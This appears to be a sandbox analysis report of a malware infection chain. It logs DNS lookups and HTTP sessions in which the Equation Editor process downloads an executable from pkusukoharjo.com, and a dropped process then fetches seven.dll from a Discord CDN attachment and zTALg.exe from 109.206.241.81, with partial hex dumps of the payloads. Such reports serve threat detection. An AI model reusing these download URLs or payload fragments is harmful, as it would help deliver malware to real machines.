Aug 5, 2022 11:41:35.498608112 CEST | 8.8.8.8 | 192.168.2.22 | 0xdd2e | No error (0) | cdn.discordapp.com |  | 162.159.135.233 | A (IP address) | IN (0x0001)
Aug 5, 2022 11:41:35.498608112 CEST | 8.8.8.8 | 192.168.2.22 | 0xdd2e | No error (0) | cdn.discordapp.com |  | 162.159.130.233 | A (IP address) | IN (0x0001)
Aug 5, 2022 11:41:35.498608112 CEST | 8.8.8.8 | 192.168.2.22 | 0xdd2e | No error (0) | cdn.discordapp.com |  | 162.159.134.233 | A (IP address) | IN (0x0001)
Aug 5, 2022 11:41:35.498608112 CEST | 8.8.8.8 | 192.168.2.22 | 0xdd2e | No error (0) | cdn.discordapp.com |  | 162.159.133.233 | A (IP address) | IN (0x0001)
                                • pkusukoharjo.com
                                • cdn.discordapp.com
                                • 109.206.241.81
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.22 | 49171 | 136.243.86.20 | 443 | C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
Timestamp | kBytes transferred | Direction | Data


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
1 | 192.168.2.22 | 49172 | 162.159.129.233 | 443 | C:\Users\user\AppData\Roaming\jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe
Timestamp | kBytes transferred | Direction | Data


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
2 | 192.168.2.22 | 49173 | 109.206.241.81 | 80 | C:\Users\user\AppData\Roaming\jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe
Timestamp | kBytes transferred | Direction | Data
Aug 5, 2022 11:41:36.249592066 CEST | 115 | OUT | GET /htdocs/zTALg.exe HTTP/1.1
Host: 109.206.241.81
Connection: Keep-Alive
Aug 5, 2022 11:41:36.279833078 CEST | 116 | IN | HTTP/1.1 200 OK
Date: Fri, 05 Aug 2022 09:41:36 GMT
Server: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/7.4.29
Last-Modified: Sun, 31 Jul 2022 13:41:30 GMT
ETag: "34400-5e51a0a6efe70"
Accept-Ranges: bytes
Content-Length: 214016
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/x-msdownload
                                Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 93 54 de 62 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 08 00 00 3c 03 00 00 06 00 00 00 00 00 00 ce 5b 03 00 00 20 00 00 00 00 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 a0 03 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 78 5b 03 00 53 00 00 00 00 60 03 00 f8 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 03 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 d4 3b 03 00 00 20 00 00 00 3c 03 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 f8 02 00 00 00 60 03 00 00 04 00 00 00 3e 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 80 03 00 00 02 00 00 00 42 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 5b 03 00 00 00 00 00 48 00 00 00 02 00 05 00 bc 84 02 00 bc d6 00 00 03 00 00 00 11 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1e 02 28 01 00 00 0a 2a 1e 02 28 04 00 00 0a 2a a6 73 06 00 00 0a 80 01 00 00 04 73 07 00 00 0a 80 02 00 00 04 73 08 00 00 0a 80 03 00 00 04 73 09 00 00 0a 80 04 00 00 04 2a 00 00 
13 30 02 00 2c 00 00 00 01 00 00 11 16 0b 2b 1b 00 07 17 fe 01 2c 02 18 0b 00 07 16 fe 01 2c 02 17 0b 00 07 18 fe 01 2c 02 2b 02 2b e3 7e 01 00 00 04 6f 0a 00 00 0a 2a 13 30 02 00 2c 00 00 00 02 00 00 11 16 0b 2b 1b 00 07 17 fe 01 2c 02 18 0b 00 07 16 fe 01 2c 02 17 0b 00 07 18 fe 01 2c 02 2b 02 2b e3 7e 02 00 00 04 6f 0b 00 00 0a 2a 13 30 02 00 2c 00 00 00 03 00 00 11 16 0b 2b 1b 00 07 17 fe 01 2c 02 18 0b 00 07 16 fe 01 2c 02 17 0b 00 07 18 fe 01 2c 02 2b 02 2b e3 7e 03 00 00 04 6f 0c 00 00 0a 2a 13 30 02 00 2c 00 00 00 04 00 00 11 16 0b 2b 1b 00 07 17 fe 01 2c 02 18 0b 00 07 16 fe 01 2c 02 17 0b 00 07 18 fe 01 2c 02 2b 02 2b e3 7e 04 00 00 04 6f 0d 00 00 0a 2a 13 30 02 00 2e 00 00 00 05 00 00 11 16 0b 2b 1b 00 07 17 fe 01 2c 02 18 0b 00 07 16 fe 01 2c 02 17 0b 00 07 18 fe 01 2c 02 2b 02 2b e3 02 03 28 11 00 00 0a 28 12 00 00 0a 2a 00 00 13 30 02 00 28 00 00 00 06 00 00 11 16 0b 2b 1b 00 07 17 fe 01 2c 02 18 0b 00 07 16 fe 01 2c 02 17 0b 00 07 18 fe 01 2c 02 2b 02 2b e3 02 28 13 00 00 0a 2a 13 30 02 00 2c 00 00 00 07 00 00 11 16 0b 2b 1b 00 07 17 fe
                                Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELTb<[ @ @x[S` H.text; < `.rsrc`>@@.relocB@B[H(*(*ssss*0,+,,,++~o*0,+,,,++~o*0,+,,,++~o*0,+,,,++~o*0.+,,,++((*0(+,,,++(*0,+
                                Aug 5, 2022 11:41:36.279875040 CEST118INData Raw: 01 2c 02 18 0b 00 07 16 fe 01 2c 02 17 0b 00 07 18 fe 01 2c 02 2b 02 2b e3 d0 05 00 00 02 28 14 00 00 0a 2a 13 30 02 00 28 00 00 00 08 00 00 11 16 0b 2b 1b 00 07 17 fe 01 2c 02 18 0b 00 07 16 fe 01 2c 02 17 0b 00 07 18 fe 01 2c 02 2b 02 2b e3 02
                                Data Ascii: ,,,++(*0(+,,,++(*0C+;,,-%,(+*,,++*0*(*0O+C,~-2
                                Aug 5, 2022 11:41:36.279906034 CEST119INData Raw: 61 02 00 06 28 23 00 00 0a 28 38 00 00 0a 26 de 0c 28 2d 00 00 0a 28 2e 00 00 0a de 00 2a 01 10 00 00 00 00 07 00 30 37 00 0c 1d 00 00 01 1b 30 03 00 d1 01 00 00 10 00 00 11 7e 15 00 00 04 39 c6 01 00 00 7e 18 00 00 04 7e 14 00 00 04 16 28 30 00
                                Data Ascii: a(#(8&(-(.*070~9~~(0;(]("(b(#(9-(]("(b(#(:&~(;,[~(<(=+.o>o?(<(03o@2(-(.
                                Aug 5, 2022 11:41:36.279937029 CEST121INData Raw: 00 00 0a 28 2a 00 00 06 06 28 4f 00 00 0a 28 23 00 00 0a 6f 52 00 00 0a 7e 1c 00 00 04 28 5f 02 00 06 28 49 02 00 06 6f 4a 00 00 0a 28 22 02 00 06 28 4b 00 00 0a 0b 12 01 28 6a 02 00 06 28 4c 00 00 0a 28 70 02 00 06 28 4e 00 00 0a 28 73 02 00 06
                                Data Ascii: (*(O(#oR~(_(IoJ("(K(j(L(p(N(s(+(t(((A(Q(*(#oR~(_(IoJ("(K(j(L(p(N(s(+(t((`(-~(u(K~
                                Aug 5, 2022 11:41:36.279968023 CEST122INData Raw: 00 00 0a 2a 00 00 01 10 00 00 02 00 11 00 9e af 00 0e 00 00 00 00 1b 30 06 00 3f 01 00 00 16 00 00 11 28 47 01 00 06 0a 06 6f 48 00 00 0a 0b 7e 13 00 00 04 16 33 11 1c 07 28 49 00 00 0a 28 24 00 00 06 38 04 01 00 00 7e 13 00 00 04 17 33 2f 28 7f
                                Data Ascii: *0?(GoH~3(I($8~3/((,(*sd(%(-(.~3e(~(_(IoJ(h(K~(L((M('l(-(.`~3
                                Aug 5, 2022 11:41:36.279998064 CEST123INData Raw: 00 00 0a 0c 08 11 04 73 87 00 00 0a 0d 09 02 6f 88 00 00 0a 7e 24 00 00 04 05 16 fe 01 5f 39 ae 00 00 00 09 16 6f 89 00 00 0a 28 51 00 00 0a 03 6f 52 00 00 0a 13 07 11 07 73 64 00 00 0a 13 08 73 8a 00 00 0a 13 06 11 06 28 74 02 00 06 6f 8b 00 00
                                Data Ascii: so~$_9o(QoRsds(to(h(K~(L(p(Noso(h(K~(L(p(Nooo(o+oo_,;o
                                Aug 5, 2022 11:41:36.280029058 CEST125INData Raw: 07 8e b7 6f 74 00 00 0a 08 11 0c 0e 05 11 0c 6f a8 00 00 0a 28 a9 00 00 0a 13 0a 28 51 00 00 0a 11 0a 6f 52 00 00 0a 13 0b 11 06 11 0b 16 11 0b 8e b7 6f 74 00 00 0a 11 14 6f aa 00 00 0a 2d ae de 16 11 14 75 39 00 00 01 2c 0c 11 14 75 39 00 00 01
                                Data Ascii: oto((QoRoto-u9,u9o]ot(((QoRotot((((&oRotoeouovswox
                                Aug 5, 2022 11:41:36.280057907 CEST126INData Raw: 0a 2a 1e 02 13 30 05 00 a8 01 00 00 1e 00 00 11 16 13 14 38 99 01 00 00 00 11 14 1a fe 01 2c 29 12 10 28 af 00 00 0a 28 04 00 00 06 6f b0 00 00 0a 6f b1 00 00 0a 13 11 12 11 28 b2 00 00 0a 73 b3 00 00 0a 13 06 1b 13 14 00 11 14 1d fe 01 2c 0f 28
                                Data Ascii: *08,)((oo(s,((,s,,(,jo,"((o,2js,(
                                Aug 5, 2022 11:41:36.280088902 CEST127INData Raw: 01 2c 0c 16 06 8e b7 17 da 13 04 0c 1b 13 05 00 11 05 1c fe 01 2c 1f 08 18 5d 16 fe 01 08 06 8e b7 17 da fe 01 16 fe 01 5f 08 16 fe 02 5f 39 5c ff ff ff 1d 13 05 00 11 05 1b fe 01 2c 08 38 38 ff ff ff 1c 13 05 00 11 05 19 fe 01 2c 09 73 61 00 00
                                Data Ascii: ,,]__9\,88,sa,,+8oco*z((((}**0#8,{+tso,{+o,{
                                Aug 5, 2022 11:41:36.280119896 CEST129INData Raw: 14 14 28 98 00 00 0a 28 e2 00 00 0a 28 cc 00 00 0a 3a 6e ff ff ff 07 14 28 d3 02 00 06 16 8d 07 00 00 01 14 14 14 28 98 00 00 0a 28 e3 00 00 0a 0a de 10 25 28 2d 00 00 0a 0d 16 0a 28 2e 00 00 0a de 00 06 2a 00 00 00 41 1c 00 00 00 00 00 00 00 00
                                Data Ascii: (((:n(((%(-(.*A0['({*(9-{*(:&{*((#(;->so;{*((#o%(-(.,o]{*((#
                                Aug 5, 2022 11:41:36.308034897 CEST130INData Raw: 0e 11 0e 16 11 09 a2 11 0e 13 0f 11 0f 14 14 17 8d 52 00 00 01 13 10 11 10 16 17 9c 11 10 17 28 9c 00 00 0a 26 11 10 16 90 2c 1f 11 0f 16 9a 28 11 00 00 0a d0 0c 00 00 1b 28 14 00 00 0a 28 a0 00 00 0a 74 0c 00 00 1b 13 09 1f 60 0a 11 09 8e b7 17
                                Data Ascii: R(&,(((t`/oQ_QcQ((((oR/((Q8V(9


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.22 | 49171 | 136.243.86.20 | 443 | C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
Timestamp | kBytes transferred | Direction | Data
2022-08-05 09:41:32 UTC | 0 | OUT | GET /giving/qGTGx.exe HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: pkusukoharjo.com
Connection: Keep-Alive
2022-08-05 09:41:32 UTC | 0 | IN | HTTP/1.1 200 OK
Date: Fri, 05 Aug 2022 09:41:32 GMT
Server: Apache
Last-Modified: Sun, 31 Jul 2022 13:50:36 GMT
Accept-Ranges: bytes
Content-Length: 8704
Connection: close
Content-Type: application/x-msdownload
                                2022-08-05 09:41:32 UTC0INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 1b 88 e6 62 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0b 00 00 18 00 00 00 08 00 00 00 00 00 00 de 37 00 00 00 20 00 00 00 40 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 80 00 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00
                                Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELb7 @@ @
                                2022-08-05 09:41:32 UTC8INData Raw: 65 76 65 6c 20 6c 65 76 65 6c 3d 22 61 73 49 6e 76 6f 6b 65 72 22 20 75 69 41 63 63 65 73 73 3d 22 66 61 6c 73 65 22 2f 3e 0d 0a 20 20 20 20 20 20 3c 2f 72 65 71 75 65 73 74 65 64 50 72 69 76 69 6c 65 67 65 73 3e 0d 0a 20 20 20 20 3c 2f 73 65 63 75 72 69 74 79 3e 0d 0a 20 20 3c 2f 74 72 75 73 74 49 6e 66 6f 3e 0d 0a 3c 2f 61 73 73 65 6d 62 6c 79 3e 0d 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 00 00 0c 00 00 00 e0 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                Data Ascii: evel level="asInvoker" uiAccess="false"/> </requestedPrivileges> </security> </trustInfo></assembly>07


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
1 | 192.168.2.22 | 49172 | 162.159.129.233 | 443 | C:\Users\user\AppData\Roaming\jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe
Timestamp | kBytes transferred | Direction | Data
2022-08-05 09:41:36 UTC | 9 | OUT | GET /attachments/1001850193580392480/1002961152617222144/seven.dll HTTP/1.1
Host: cdn.discordapp.com
Connection: Keep-Alive
2022-08-05 09:41:36 UTC | 9 | IN | HTTP/1.1 200 OK
Date: Fri, 05 Aug 2022 09:41:36 GMT
Content-Type: application/x-msdos-program
Content-Length: 87040
Connection: close
CF-Ray: 735e93f4e803917c-FRA
Accept-Ranges: bytes
Age: 413704
Cache-Control: public, max-age=31536000
Content-Disposition: attachment;%20filename=seven.dll, attachment
ETag: "2851da4de93a5c4b08e7da2826112280"
Expires: Sat, 05 Aug 2023 09:41:36 GMT
Last-Modified: Sat, 30 Jul 2022 15:29:32 GMT
Vary: Accept-Encoding
CF-Cache-Status: HIT
Alt-Svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
x-goog-generation: 1659194972956420
x-goog-hash: crc32c=8mCulQ==
x-goog-hash: md5=KFHaTek6XEsI59ooJhEigA==
x-goog-metageneration: 1
x-goog-storage-class: STANDARD
x-goog-stored-content-encoding: identity
x-goog-stored-content-length: 87040
X-GUploader-UploadID: ADPycds5b2CHJAt_kHBlbZKsfyHFbeIkycGhR-EB4H_CNzfN58kbv3R3-Y3p7uBrmiWmMwfc1qb2ghWSD94ralZViz0AeYJdb2Iy
X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=89ReIRTIqYMHUH6qW0Rjrx86JhSs4wkT1Qdn0V2a0ZgE%2FIit6XRToktZJxmD8M%2BNbzXPCDlqEkj93R%2FrfzgBCBAotKwJDiOBa9UGZALrIIrBlt%2BR1vfz78IxqlgQ1LPQNq36eg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                2022-08-05 09:41:36 UTC10INData Raw: 4e 45 4c 3a 20 7b 22 73 75 63 63 65 73 73 5f 66 72 61 63 74 69 6f 6e 22 3a 30 2c 22 72 65 70 6f 72 74 5f 74 6f 22 3a 22 63 66 2d 6e 65 6c 22 2c 22 6d 61 78 5f 61 67 65 22 3a 36 30 34 38 30 30 7d 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 0d 0a
                                Data Ascii: NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflare
                                2022-08-05 09:41:36 UTC10INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 fa 4d e5 62 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0b 00 00 22 01 00 00 30 00 00 00 00 00 00 5e 41 01 00 00 20 00 00 00 60 01 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 c0 01 00 00 02 00 00 00 00 00 00 03 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00
                                Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELMb!"0^A `@ `
                                2022-08-05 09:41:36 UTC11INData Raw: ff 11 08 20 01 00 00 00 94 58 11 08 20 00 00 00 00 94 58 9e 00 11 08 20 03 00 00 00 20 d2 01 00 00 11 08 20 02 00 00 00 94 59 11 08 20 01 00 00 00 94 58 11 08 20 00 00 00 00 94 59 9e 00 fe 0c 17 00 11 08 20 03 00 00 00 94 5b fe 0e 16 00 fe 0c 16 00 20 6c f5 1c 00 59 38 b6 fe ff ff 7e 2b 00 00 04 fe 0d 07 00 28 7d 00 00 0a fe 0c 07 00 6f 7e 00 00 0a fe 0c 09 00 fe 0e 2a 00 20 05 00 00 00 8d 59 00 00 01 13 08 11 08 20 00 00 00 00 20 30 01 00 00 9e 00 11 08 20 01 00 00 00 20 43 02 00 00 11 08 20 00 00 00 00 94 59 9e 00 11 08 20 02 00 00 00 20 37 03 00 00 11 08 20 01 00 00 00 94 59 11 08 20 00 00 00 00 94 59 9e 00 11 08 20 03 00 00 00 20 d0 00 00 00 11 08 20 02 00 00 00 94 58 11 08 20 01 00 00 00 94 59 11 08 20 00 00 00 00 94 58 9e 00 11 08 20 04 00 00 00 20
                                Data Ascii: X X Y X Y [ lY8~+(}o~* Y 0 C Y 7 Y Y X Y X
                                Data Ascii: stanceEventArgsetZEqsItNNUNOJNerIlOHmTjvFURUBfLkOToQdTrZILVqfLNcvBCOWEjlXZQnmXIRezTZHiNoPpUaytPPHJYUcSOKjDtZDZmkXEgfNJqhnNUhFIIyJVfxUoJhlIKEpJlpCjYuNFXTTLCkxgEaPQQCtsDGWjtInneAtvQDeNPDgqqNSGNYNgLCmLOlPCVOSkAVkYMicrosoft.VisualBasic.Applicati
                                2022-08-05 09:41:36 UTC67INData Raw: 6d 62 6c 79 44 65 73 63 72 69 70 74 69 6f 6e 41 74 74 72 69 62 75 74 65 00 41 73 73 65 6d 62 6c 79 54 69 74 6c 65 41 74 74 72 69 62 75 74 65 00 53 74 61 72 74 75 70 4e 65 78 74 49 6e 73 74 61 6e 63 65 45 76 65 6e 74 41 72 67 73 2e 64 6c 6c 00 36 41 35 33 37 30 30 30 00 38 39 34 32 33 46 31 30 00 46 36 39 34 44 37 39 30 00 43 36 34 37 41 35 30 31 00 45 42 43 31 33 34 41 31 00 43 34 45 45 30 41 43 31 00 45 43 42 44 41 37 34 32 00 46 34 31 46 44 38 38 32 00 32 45 37 38 37 39 38 32 00 32 33 44 41 35 43 38 32 00 31 37 36 46 33 30 43 32 00 38 31 41 43 38 44 45 32 00 45 35 33 46 31 35 30 33 00 44 39 41 41 32 32 32 33 00 37 42 36 36 44 35 36 34 00 33 38 30 34 30 34 41 34 00 45 30 42 32 41 41 34 00 32 31 35 35 34 41 46 34 00 39 38 39 31 30 38 30 35 00 37 45 45 36
                                Data Ascii: mblyDescriptionAttributeAssemblyTitleAttributeStartupNextInstanceEventArgs.dll6A53700089423F10F694D790C647A501EBC134A1C4EE0AC1ECBDA742F41FD8822E78798223DA5C82176F30C281AC8DE2E53F1503D9AA22237B66D564380404A4E0B2AA421554AF4989108057EE6
                                2022-08-05 09:41:36 UTC71INData Raw: b4 8f ca 99 d2 93 e1 b4 9c 73 e1 b4 84 e1 b4 80 e1 b4 9b e1 b4 87 e1 b4 85 20 ca 99 ca 8f 20 73 e1 b4 87 e1 b4 a0 e1 b4 87 c9 b4 20 e1 b4 87 ca 8f e1 b4 87 20 e1 b4 84 ca 80 ca 8f e1 b4 98 e1 b4 9b e1 b4 87 ca 80 e8 8d 89 d0 b5 e7 85 99 d7 a4 d7 a4 e3 83 a7 d0 b0 e3 82 b7 d7 a6 e0 a4 85 e0 a4 aa d7 98 d7 98 d7 98 d0 b8 e0 a4 9a d7 93 d1 8a e5 84 bf e5 84 bf e8 bf aa e3 82 87 e3 81 93 e8 af b6 d1 82 e0 a4 aa e5 a8 9c e5 b1 81 d7 96 e0 a4 9b e8 af b6 d0 b2 d0 b8 d7 a9 e0 a4 aa e3 82 87 d7 a1 e3 82 a6 e3 82 a6 e0 a4 aa d7 a8 e5 84 bf d7 93 e9 87 91 e0 a4 ae e3 82 bf e5 b0 ba e3 82 b3 e3 81 97 d0 b1 d0 b5 e3 83 a7 e3 82 b3 d0 b4 e5 b0 ba e3 81 8e e0 a4 aa d0 b5 e3 83 a7 e5 84 bf e3 82 8f e5 a4 8d d7 98 e0 a4 8f e0 a4 9a d7 98 e8 a5 bf d1 82 d0 b5 e5 84 bf d7
                                Data Ascii: s s
                                2022-08-05 09:41:36 UTC72INData Raw: 20 73 e1 b4 87 e1 b4 a0 e1 b4 87 c9 b4 20 e1 b4 87 ca 8f e1 b4 87 20 e1 b4 84 ca 80 ca 8f e1 b4 98 e1 b4 9b e1 b4 87 ca 80 d1 8a e3 81 93 d7 a6 e3 82 b7 e0 a4 aa d0 b2 e5 bc 80 d0 b5 d7 98 e5 bc 80 e5 a8 9c e9 a9 ac e8 af b6 e3 81 9f e3 82 ad e0 a4 aa e0 a4 8f e3 82 87 e6 9d b0 d7 a6 e6 9d b0 d1 8a e3 82 bf e3 82 8f e3 82 87 d7 a9 e3 82 b3 e3 82 bf e3 83 a7 e0 a4 9b e8 89 be e3 81 b0 d0 b5 d7 90 e5 90 be e8 b4 bc e3 82 a6 d7 96 d0 b1 e5 84 bf e3 81 9f e4 b8 bd e5 a4 8d e3 82 8f e0 a4 9b e3 82 bf e3 81 93 e0 a4 9b e3 82 87 e3 81 97 d0 b2 e3 82 bf e8 af b6 e3 82 bf e5 b1 81 e3 82 87 e0 a4 85 e3 81 93 e3 81 8e d0 b6 d1 8a d7 a6 e0 a4 82 e3 82 b7 e3 83 a7 e3 82 b7 e3 82 bf e5 b0 ba e5 b1 81 d0 b2 e8 8d 89 e5 b1 81 e5 bc 80 e3 82 bf e9 a9 ac d7 96 d1 82 e3 82
                                Data Ascii: s
                                2022-08-05 09:41:36 UTC77INData Raw: 00 72 00 68 00 54 00 69 00 53 00 42 00 57 00 57 00 54 00 6f 00 59 00 44 00 78 00 46 00 66 00 45 00 67 00 6b 00 65 00 6d 00 75 00 69 00 53 00 42 00 57 00 57 00 54 00 6f 00 59 00 44 00 78 00 46 00 66 00 45 00 67 00 6b 00 73 00 65 00 52 00 69 00 53 00 42 00 57 00 57 00 54 00 6f 00 59 00 44 00 78 00 46 00 66 00 45 00 67 00 6b 00 00 1f 69 00 53 00 42 00 57 00 57 00 54 00 6f 00 59 00 44 00 78 00 46 00 66 00 45 00 67 00 6b 00 00 0b 22 00 7b 00 30 00 7d 00 22 00 00 03 20 00 00 4d 53 00 74 00 61 00 72 00 74 00 75 00 70 00 4e 00 65 00 78 00 74 00 49 00 6e 00 73 00 74 00 61 00 6e 00 63 00 65 00 45 00 76 00 65 00 6e 00 74 00 41 00 72 00 67 00 73 00 2e 00 52 00 65 00 73 00 6f 00 75 00 72 00 63 00 65 00 73 00 00 00 00 4d cf 6a f0 6a dd 6a ee 6a f0 6a f1 6a ec 6a ca 6a
                                Data Ascii: rhTiSBWWToYDxFfEgkemuiSBWWToYDxFfEgkseRiSBWWToYDxFfEgkiSBWWToYDxFfEgk"{0}" MStartupNextInstanceEventArgs.ResourcesMjjjjjjjj
                                2022-08-05 09:41:36 UTC81INData Raw: 00 01 08 12 15 04 00 01 02 0e 06 00 03 0e 0e 0e 0e 0c 00 05 01 12 80 a9 08 12 80 a9 08 08 05 00 01 1d 05 08 06 00 01 01 12 80 9d 05 00 01 12 61 08 49 07 34 11 64 11 60 12 3c 12 40 0e 12 54 12 5c 02 0e 0e 0e 0e 0e 0e 0e 0e 0e 0e 12 44 12 38 0e 12 48 12 50 0e 12 58 12 4c 1d 08 08 1d 05 02 08 08 08 08 08 08 08 08 08 08 08 08 08 08 1d 05 12 80 9d 12 61 1d 0e 08 02 02 08 0b 10 01 01 1e 00 15 12 1d 01 1e 00 03 0a 01 0e 05 20 02 0e 0e 0e 04 00 01 0e 0e 05 07 03 0e 0e 0e 03 07 01 02 04 01 00 00 00 06 20 01 01 11 80 c1 06 20 01 01 11 80 c9 02 1e 24 06 20 01 01 11 80 d1 08 01 00 01 00 00 00 00 00 05 20 02 01 0e 0e 18 01 00 0a 4d 79 54 65 6d 70 6c 61 74 65 08 31 31 2e 30 2e 30 2e 30 00 00 06 15 12 18 01 12 0c 06 15 12 18 01 12 08 06 15 12 18 01 12 11 06 15 12 18 01
                                Data Ascii: aI4d`<@T\D8HPXLa $ MyTemplate11.0.0.0
                                2022-08-05 09:41:36 UTC85INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 01 01 01 01 01 01 01 01 01 01 01 01 01 01 03 03 01 02 02 02 02 02 02 02 02 02 02 02 02 01 03 03 01 02 02 02 02 02 02 02 02 02 02 02 02 01 03 03 01 02 02 02 02 02 02 02 02 02 02 02 02 01 03 03 01 02 02 02 02 02 02 02 02 02 02 02 02 01 03 03 01 02 02 02 02 02 02 02 02 02 02 02 02 01 03 03 01 02 02 02 02 02 02 02 02 02 02 02 02 01 03 03 01 02 02 02 02 02 02 02 02 02 02 02 02 01 03 03 01 02 02 02 02 02 02 02 02 02 02 02 02 01 03 03 01 01 01 01 01 01 01 01 01 01 01 01 01 01 03 03 01 01 01 01 01 01 01 01 01 01 01 01 01 01 03 03 01 01 01 01 01 01 01 01 01 01 01 01 01 01 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                Data Ascii:
